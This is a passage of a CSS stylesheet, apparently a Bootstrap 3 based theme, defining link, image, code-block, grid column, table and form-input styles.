  color: #b35f00;
  text-decoration: underline;
}
a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
figure {
  margin: 0;
}
img {
  vertical-align: middle;
}
.img-responsive,
.thumbnail > img,
.thumbnail a > img,
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  display: block;
  max-width: 100%;
  height: auto;
}
.img-rounded {
  border-radius: 0;
}
.img-thumbnail {
  padding: 4px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
  -webkit-transition: all 0.2s ease-in-out;
  -o-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
  display: inline-block;
  max-width: 100%;
  height: auto;
}
.img-circle {
  border-radius: 50%;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.sr-only {
  position: absolute;
  width: 1px;
  height: 1px;
  padding: 0;
  margin: -1px;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  border: 0;
}
.sr-only-focusable:active,
.sr-only-focusable:focus {
  position: static;
  width: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  clip: auto;
}
[role="button"] {
  cursor: pointer;
}

code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
code {
  padding: 2px 4px;
  font-size: 90%;
  color: #c7254e;
  background-color: #f9f2f4;
  border-radius: 0;
}
kbd {
  padding: 2px 4px;
  font-size: 90%;
  color: #ffffff;
  background-color: #333333;
  border-radius: 0;
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.25);
}
kbd kbd {
  padding: 0;
  font-size: 100%;
  font-weight: 700;
  box-shadow: none;
}
pre {
  display: block;
  padding: 9.5px;
  margin: 0 0 10px;
  font-size: 13px;
  line-height: 1.42857143;
  color: #444444;
  word-break: break-all;
  word-wrap: break-word;
  background-color: #f5f5f5;
  border: 1px solid #cccccc;
  border-radius: 0;
}
pre code {
  padding: 0;
  font-size: inherit;
  color: inherit;
  white-space: pre-wrap;
  background-color: transparent;
  border-radius: 0;
}
.pre-scrollable {
  max-height: 340px;
  overflow-y: scroll;
}
.container {
  padding-right: 20px;
  padding-left: 20px;
  margin-right: auto;
  margin-left: auto;
}
@media (min-width: 768px) {
  .container {
    width: 760px;
  }
}
@media (min-width: 992px) {
  .container {
    width: 980px;
  }
}
@media (min-width: 1200px) {
  .container {
    width: 1180px;
  }
}
.container-fluid {
  padding-right: 20px;
  padding-left: 20px;
  margin-right: auto;
  margin-left: auto;
}
.row {
  margin-right: -20px;
  margin-left: -20px;
}
.row-no-gutters {
  margin-right: 0;
  margin-left: 0;
}
.row-no-gutters [class*="col-"] {
  padding-right: 0;
  padding-left: 0;
}
.col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 {
  position: relative;
  min-height: 1px;
  padding-right: 20px;
  padding-left: 20px;
}
.col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 {
  float: left;
}
.col-xs-12 {
  width: 100%;
}
.col-xs-11 {
  width: 91.66666667%;
}
.col-xs-10 {
  width: 83.33333333%;
}
.col-xs-9 {
  width: 75%;
}
.col-xs-8 {
  width: 66.66666667%;
}
.col-xs-7 {
  width: 58.33333333%;
}
.col-xs-6 {
  width: 50%;
}
.col-xs-5 {
  width: 41.66666667%;
}
.col-xs-4 {
  width: 33.33333333%;
}
.col-xs-3 {
  width: 25%;
}
.col-xs-2 {
  width: 16.66666667%;
}
.col-xs-1 {
  width: 8.33333333%;
}
.col-xs-pull-12 {
  right: 100%;
}
.col-xs-pull-11 {
  right: 91.66666667%;
}
.col-xs-pull-10 {
  right: 83.33333333%;
}
.col-xs-pull-9 {
  right: 75%;
}
.col-xs-pull-8 {
  right: 66.66666667%;
}
.col-xs-pull-7 {
  right: 58.33333333%;
}
.col-xs-pull-6 {
  right: 50%;
}
.col-xs-pull-5 {
  right: 41.66666667%;
}
.col-xs-pull-4 {
  right: 33.33333333%;
}
.col-xs-pull-3 {
  right: 25%;
}
.col-xs-pull-2 {
  right: 16.66666667%;
}
.col-xs-pull-1 {
  right: 8.33333333%;
}
.col-xs-pull-0 {
  right: auto;
}
.col-xs-push-12 {
  left: 100%;
}
.col-xs-push-11 {
  left: 91.66666667%;
}
.col-xs-push-10 {
  left: 83.33333333%;
}
.col-xs-push-9 {
  left: 75%;
}
.col-xs-push-8 {
  left: 66.66666667%;
}
.col-xs-push-7 {
  left: 58.33333333%;
}
.col-xs-push-6 {
  left: 50%;
}
.col-xs-push-5 {
  left: 41.66666667%;
}
.col-xs-push-4 {
  left: 33.33333333%;
}
.col-xs-push-3 {
  left: 25%;
}
.col-xs-push-2 {
  left: 16.66666667%;
}
.col-xs-push-1 {
  left: 8.33333333%;
}
.col-xs-push-0 {
  left: auto;
}
.col-xs-offset-12 {
  margin-left: 100%;
}
.col-xs-offset-11 {
  margin-left: 91.66666667%;
}
.col-xs-offset-10 {
  margin-left: 83.33333333%;
}
.col-xs-offset-9 {
  margin-left: 75%;
}
.col-xs-offset-8 {
  margin-left: 66.66666667%;
}
.col-xs-offset-7 {
  margin-left: 58.33333333%;
}
.col-xs-offset-6 {
  margin-left: 50%;
}
.col-xs-offset-5 {
  margin-left: 41.66666667%;
}
.col-xs-offset-4 {
  margin-left: 33.33333333%;
}
.col-xs-offset-3 {
  margin-left: 25%;
}
.col-xs-offset-2 {
  margin-left: 16.66666667%;
}
.col-xs-offset-1 {
  margin-left: 8.33333333%;
}
.col-xs-offset-0 {
  margin-left: 0%;
}
@media (min-width: 768px) {
  .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 {
    float: left;
  }
  .col-sm-12 {
    width: 100%;
  }
  .col-sm-11 {
    width: 91.66666667%;
  }
  .col-sm-10 {
    width: 83.33333333%;
  }
  .col-sm-9 {
    width: 75%;
  }
  .col-sm-8 {
    width: 66.66666667%;
  }
  .col-sm-7 {
    width: 58.33333333%;
  }
  .col-sm-6 {
    width: 50%;
  }
  .col-sm-5 {
    width: 41.66666667%;
  }
  .col-sm-4 {
    width: 33.33333333%;
  }
  .col-sm-3 {
    width: 25%;
  }
  .col-sm-2 {
    width: 16.66666667%;
  }
  .col-sm-1 {
    width: 8.33333333%;
  }
  .col-sm-pull-12 {
    right: 100%;
  }
  .col-sm-pull-11 {
    right: 91.66666667%;
  }
  .col-sm-pull-10 {
    right: 83.33333333%;
  }
  .col-sm-pull-9 {
    right: 75%;
  }
  .col-sm-pull-8 {
    right: 66.66666667%;
  }
  .col-sm-pull-7 {
    right: 58.33333333%;
  }
  .col-sm-pull-6 {
    right: 50%;
  }
  .col-sm-pull-5 {
    right: 41.66666667%;
  }
  .col-sm-pull-4 {
    right: 33.33333333%;
  }
  .col-sm-pull-3 {
    right: 25%;
  }
  .col-sm-pull-2 {
    right: 16.66666667%;
  }
  .col-sm-pull-1 {
    right: 8.33333333%;
  }
  .col-sm-pull-0 {
    right: auto;
  }
  .col-sm-push-12 {
    left: 100%;
  }
  .col-sm-push-11 {
    left: 91.66666667%;
  }
  .col-sm-push-10 {
    left: 83.33333333%;
  }
  .col-sm-push-9 {
    left: 75%;
  }
  .col-sm-push-8 {
    left: 66.66666667%;
  }
  .col-sm-push-7 {
    left: 58.33333333%;
  }
  .col-sm-push-6 {
    left: 50%;
  }
  .col-sm-push-5 {
    left: 41.66666667%;
  }
  .col-sm-push-4 {
    left: 33.33333333%;
  }
  .col-sm-push-3 {
    left: 25%;
  }
  .col-sm-push-2 {
    left: 16.66666667%;
  }
  .col-sm-push-1 {
    left: 8.33333333%;
  }
  .col-sm-push-0 {
    left: auto;
  }
  .col-sm-offset-12 {
    margin-left: 100%;
  }
  .col-sm-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-sm-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-sm-offset-9 {
    margin-left: 75%;
  }
  .col-sm-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-sm-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-sm-offset-6 {
    margin-left: 50%;
  }
  .col-sm-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-sm-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-sm-offset-3 {
    margin-left: 25%;
  }
  .col-sm-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-sm-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-sm-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 992px) {
  .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 {
    float: left;
  }
  .col-md-12 {
    width: 100%;
  }
  .col-md-11 {
    width: 91.66666667%;
  }
  .col-md-10 {
    width: 83.33333333%;
  }
  .col-md-9 {
    width: 75%;
  }
  .col-md-8 {
    width: 66.66666667%;
  }
  .col-md-7 {
    width: 58.33333333%;
  }
  .col-md-6 {
    width: 50%;
  }
  .col-md-5 {
    width: 41.66666667%;
  }
  .col-md-4 {
    width: 33.33333333%;
  }
  .col-md-3 {
    width: 25%;
  }
  .col-md-2 {
    width: 16.66666667%;
  }
  .col-md-1 {
    width: 8.33333333%;
  }
  .col-md-pull-12 {
    right: 100%;
  }
  .col-md-pull-11 {
    right: 91.66666667%;
  }
  .col-md-pull-10 {
    right: 83.33333333%;
  }
  .col-md-pull-9 {
    right: 75%;
  }
  .col-md-pull-8 {
    right: 66.66666667%;
  }
  .col-md-pull-7 {
    right: 58.33333333%;
  }
  .col-md-pull-6 {
    right: 50%;
  }
  .col-md-pull-5 {
    right: 41.66666667%;
  }
  .col-md-pull-4 {
    right: 33.33333333%;
  }
  .col-md-pull-3 {
    right: 25%;
  }
  .col-md-pull-2 {
    right: 16.66666667%;
  }
  .col-md-pull-1 {
    right: 8.33333333%;
  }
  .col-md-pull-0 {
    right: auto;
  }
  .col-md-push-12 {
    left: 100%;
  }
  .col-md-push-11 {
    left: 91.66666667%;
  }
  .col-md-push-10 {
    left: 83.33333333%;
  }
  .col-md-push-9 {
    left: 75%;
  }
  .col-md-push-8 {
    left: 66.66666667%;
  }
  .col-md-push-7 {
    left: 58.33333333%;
  }
  .col-md-push-6 {
    left: 50%;
  }
  .col-md-push-5 {
    left: 41.66666667%;
  }
  .col-md-push-4 {
    left: 33.33333333%;
  }
  .col-md-push-3 {
    left: 25%;
  }
  .col-md-push-2 {
    left: 16.66666667%;
  }
  .col-md-push-1 {
    left: 8.33333333%;
  }
  .col-md-push-0 {
    left: auto;
  }
  .col-md-offset-12 {
    margin-left: 100%;
  }
  .col-md-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-md-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-md-offset-9 {
    margin-left: 75%;
  }
  .col-md-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-md-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-md-offset-6 {
    margin-left: 50%;
  }
  .col-md-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-md-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-md-offset-3 {
    margin-left: 25%;
  }
  .col-md-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-md-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-md-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 1200px) {
  .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 {
    float: left;
  }
  .col-lg-12 {
    width: 100%;
  }
  .col-lg-11 {
    width: 91.66666667%;
  }
  .col-lg-10 {
    width: 83.33333333%;
  }
  .col-lg-9 {
    width: 75%;
  }
  .col-lg-8 {
    width: 66.66666667%;
  }
  .col-lg-7 {
    width: 58.33333333%;
  }
  .col-lg-6 {
    width: 50%;
  }
  .col-lg-5 {
    width: 41.66666667%;
  }
  .col-lg-4 {
    width: 33.33333333%;
  }
  .col-lg-3 {
    width: 25%;
  }
  .col-lg-2 {
    width: 16.66666667%;
  }
  .col-lg-1 {
    width: 8.33333333%;
  }
  .col-lg-pull-12 {
    right: 100%;
  }
  .col-lg-pull-11 {
    right: 91.66666667%;
  }
  .col-lg-pull-10 {
    right: 83.33333333%;
  }
  .col-lg-pull-9 {
    right: 75%;
  }
  .col-lg-pull-8 {
    right: 66.66666667%;
  }
  .col-lg-pull-7 {
    right: 58.33333333%;
  }
  .col-lg-pull-6 {
    right: 50%;
  }
  .col-lg-pull-5 {
    right: 41.66666667%;
  }
  .col-lg-pull-4 {
    right: 33.33333333%;
  }
  .col-lg-pull-3 {
    right: 25%;
  }
  .col-lg-pull-2 {
    right: 16.66666667%;
  }
  .col-lg-pull-1 {
    right: 8.33333333%;
  }
  .col-lg-pull-0 {
    right: auto;
  }
  .col-lg-push-12 {
    left: 100%;
  }
  .col-lg-push-11 {
    left: 91.66666667%;
  }
  .col-lg-push-10 {
    left: 83.33333333%;
  }
  .col-lg-push-9 {
    left: 75%;
  }
  .col-lg-push-8 {
    left: 66.66666667%;
  }
  .col-lg-push-7 {
    left: 58.33333333%;
  }
  .col-lg-push-6 {
    left: 50%;
  }
  .col-lg-push-5 {
    left: 41.66666667%;
  }
  .col-lg-push-4 {
    left: 33.33333333%;
  }
  .col-lg-push-3 {
    left: 25%;
  }
  .col-lg-push-2 {
    left: 16.66666667%;
  }
  .col-lg-push-1 {
    left: 8.33333333%;
  }
  .col-lg-push-0 {
    left: auto;
  }
  .col-lg-offset-12 {
    margin-left: 100%;
  }
  .col-lg-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-lg-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-lg-offset-9 {
    margin-left: 75%;
  }
  .col-lg-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-lg-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-lg-offset-6 {
    margin-left: 50%;
  }
  .col-lg-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-lg-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-lg-offset-3 {
    margin-left: 25%;
  }
  .col-lg-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-lg-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-lg-offset-0 {
    margin-left: 0%;
  }
}
table {
  background-color: transparent;
}
table col[class*="col-"] {
  position: static;
  display: table-column;
  float: none;
}
table td[class*="col-"],
table th[class*="col-"] {
  position: static;
  display: table-cell;
  float: none;
}
caption {
  padding-top: 8px;
  padding-bottom: 8px;
  color: #999999;
  text-align: left;
}
th {
  text-align: left;
}
.table {
  width: 100%;
  max-width: 100%;
  margin-bottom: 20px;
}
.table > thead > tr > th,
.table > tbody > tr > th,
.table > tfoot > tr > th,
.table > thead > tr > td,
.table > tbody > tr > td,
.table > tfoot > tr > td {
  padding: 8px;
  line-height: 1.42857143;
  vertical-align: top;
  border-top: 1px solid #dddddd;
}
.table > thead > tr > th {
  vertical-align: bottom;
  border-bottom: 2px solid #dddddd;
}
.table > caption + thead > tr:first-child > th,
.table > colgroup + thead > tr:first-child > th,
.table > thead:first-child > tr:first-child > th,
.table > caption + thead > tr:first-child > td,
.table > colgroup + thead > tr:first-child > td,
.table > thead:first-child > tr:first-child > td {
  border-top: 0;
}
.table > tbody + tbody {
  border-top: 2px solid #dddddd;
}
.table .table {
  background-color: #ffffff;
}
.table-condensed > thead > tr > th,
.table-condensed > tbody > tr > th,
.table-condensed > tfoot > tr > th,
.table-condensed > thead > tr > td,
.table-condensed > tbody > tr > td,
.table-condensed > tfoot > tr > td {
  padding: 5px;
}
.table-bordered {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > tbody > tr > th,
.table-bordered > tfoot > tr > th,
.table-bordered > thead > tr > td,
.table-bordered > tbody > tr > td,
.table-bordered > tfoot > tr > td {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > thead > tr > td {
  border-bottom-width: 2px;
}
.table-striped > tbody > tr:nth-of-type(odd) {
  background-color: #f9f9f9;
}
.table-hover > tbody > tr:hover {
  background-color: #f5f5f5;
}
.table > thead > tr > td.active,
.table > tbody > tr > td.active,
.table > tfoot > tr > td.active,
.table > thead > tr > th.active,
.table > tbody > tr > th.active,
.table > tfoot > tr > th.active,
.table > thead > tr.active > td,
.table > tbody > tr.active > td,
.table > tfoot > tr.active > td,
.table > thead > tr.active > th,
.table > tbody > tr.active > th,
.table > tfoot > tr.active > th {
  background-color: #f5f5f5;
}
.table-hover > tbody > tr > td.active:hover,
.table-hover > tbody > tr > th.active:hover,
.table-hover > tbody > tr.active:hover > td,
.table-hover > tbody > tr:hover > .active,
.table-hover > tbody > tr.active:hover > th {
  background-color: #e8e8e8;
}
.table > thead > tr > td.success,
.table > tbody > tr > td.success,
.table > tfoot > tr > td.success,
.table > thead > tr > th.success,
.table > tbody > tr > th.success,
.table > tfoot > tr > th.success,
.table > thead > tr.success > td,
.table > tbody > tr.success > td,
.table > tfoot > tr.success > td,
.table > thead > tr.success > th,
.table > tbody > tr.success > th,
.table > tfoot > tr.success > th {
  background-color: #dff0d8;
}
.table-hover > tbody > tr > td.success:hover,
.table-hover > tbody > tr > th.success:hover,
.table-hover > tbody > tr.success:hover > td,
.table-hover > tbody > tr:hover > .success,
.table-hover > tbody > tr.success:hover > th {
  background-color: #d0e9c6;
}
.table > thead > tr > td.info,
.table > tbody > tr > td.info,
.table > tfoot > tr > td.info,
.table > thead > tr > th.info,
.table > tbody > tr > th.info,
.table > tfoot > tr > th.info,
.table > thead > tr.info > td,
.table > tbody > tr.info > td,
.table > tfoot > tr.info > td,
.table > thead > tr.info > th,
.table > tbody > tr.info > th,
.table > tfoot > tr.info > th {
  background-color: #d9edf7;
}
.table-hover > tbody > tr > td.info:hover,
.table-hover > tbody > tr > th.info:hover,
.table-hover > tbody > tr.info:hover > td,
.table-hover > tbody > tr:hover > .info,
.table-hover > tbody > tr.info:hover > th {
  background-color: #c4e3f3;
}
.table > thead > tr > td.warning,
.table > tbody > tr > td.warning,
.table > tfoot > tr > td.warning,
.table > thead > tr > th.warning,
.table > tbody > tr > th.warning,
.table > tfoot > tr > th.warning,
.table > thead > tr.warning > td,
.table > tbody > tr.warning > td,
.table > tfoot > tr.warning > td,
.table > thead > tr.warning > th,
.table > tbody > tr.warning > th,
.table > tfoot > tr.warning > th {
  background-color: #fcf8e3;
}
.table-hover > tbody > tr > td.warning:hover,
.table-hover > tbody > tr > th.warning:hover,
.table-hover > tbody > tr.warning:hover > td,
.table-hover > tbody > tr:hover > .warning,
.table-hover > tbody > tr.warning:hover > th {
  background-color: #faf2cc;
}
.table > thead > tr > td.danger,
.table > tbody > tr > td.danger,
.table > tfoot > tr > td.danger,
.table > thead > tr > th.danger,
.table > tbody > tr > th.danger,
.table > tfoot > tr > th.danger,
.table > thead > tr.danger > td,
.table > tbody > tr.danger > td,
.table > tfoot > tr.danger > td,
.table > thead > tr.danger > th,
.table > tbody > tr.danger > th,
.table > tfoot > tr.danger > th {
  background-color: #f2dede;
}
.table-hover > tbody > tr > td.danger:hover,
.table-hover > tbody > tr > th.danger:hover,
.table-hover > tbody > tr.danger:hover > td,
.table-hover > tbody > tr:hover > .danger,
.table-hover > tbody > tr.danger:hover > th {
  background-color: #ebcccc;
}
.table-responsive {
  min-height: .01%;
  overflow-x: auto;
}
@media screen and (max-width: 767px) {
  .table-responsive {
    width: 100%;
    margin-bottom: 15px;
    overflow-y: hidden;
    -ms-overflow-style: -ms-autohiding-scrollbar;
    border: 1px solid #dddddd;
  }
  .table-responsive > .table {
    margin-bottom: 0;
  }
  .table-responsive > .table > thead > tr > th,
  .table-responsive > .table > tbody > tr > th,
  .table-responsive > .table > tfoot > tr > th,
  .table-responsive > .table > thead > tr > td,
  .table-responsive > .table > tbody > tr > td,
  .table-responsive > .table > tfoot > tr > td {
    white-space: nowrap;
  }
  .table-responsive > .table-bordered {
    border: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:first-child,
  .table-responsive > .table-bordered > tbody > tr > th:first-child,
  .table-responsive > .table-bordered > tfoot > tr > th:first-child,
  .table-responsive > .table-bordered > thead > tr > td:first-child,
  .table-responsive > .table-bordered > tbody > tr > td:first-child,
  .table-responsive > .table-bordered > tfoot > tr > td:first-child {
    border-left: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:last-child,
  .table-responsive > .table-bordered > tbody > tr > th:last-child,
  .table-responsive > .table-bordered > tfoot > tr > th:last-child,
  .table-responsive > .table-bordered > thead > tr > td:last-child,
  .table-responsive > .table-bordered > tbody > tr > td:last-child,
  .table-responsive > .table-bordered > tfoot > tr > td:last-child {
    border-right: 0;
  }
  .table-responsive > .table-bordered > tbody > tr:last-child > th,
  .table-responsive > .table-bordered > tfoot > tr:last-child > th,
  .table-responsive > .table-bordered > tbody > tr:last-child > td,
  .table-responsive > .table-bordered > tfoot > tr:last-child > td {
    border-bottom: 0;
  }
}
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.inputbox {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select::-ms-expand,
textarea::-ms-expand,
input[type="text"]::-ms-expand,
input[type="password"]::-ms-expand,
input[type="datetime"]::-ms-expand,
input[type="datetime-local"]::-ms-expand,
input[type="date"]::-ms-expand,
input[type="month"]::-ms-expand,
input[type="time"]::-ms-expand,
input[type="week"]::-ms-expand,
input[type="number"]::-ms-expand,
input[type="email"]::-ms-expand,
input[type="url"]::-ms-expand,
input[type="search"]::-ms-expand,
input[type="tel"]::-ms-expand,
input[type="color"]::-ms-expand,
.inputbox::-ms-expand {
  background-color: transparent;
  border: 0;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  background-color: #eeeeee;
  opacity: 1;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
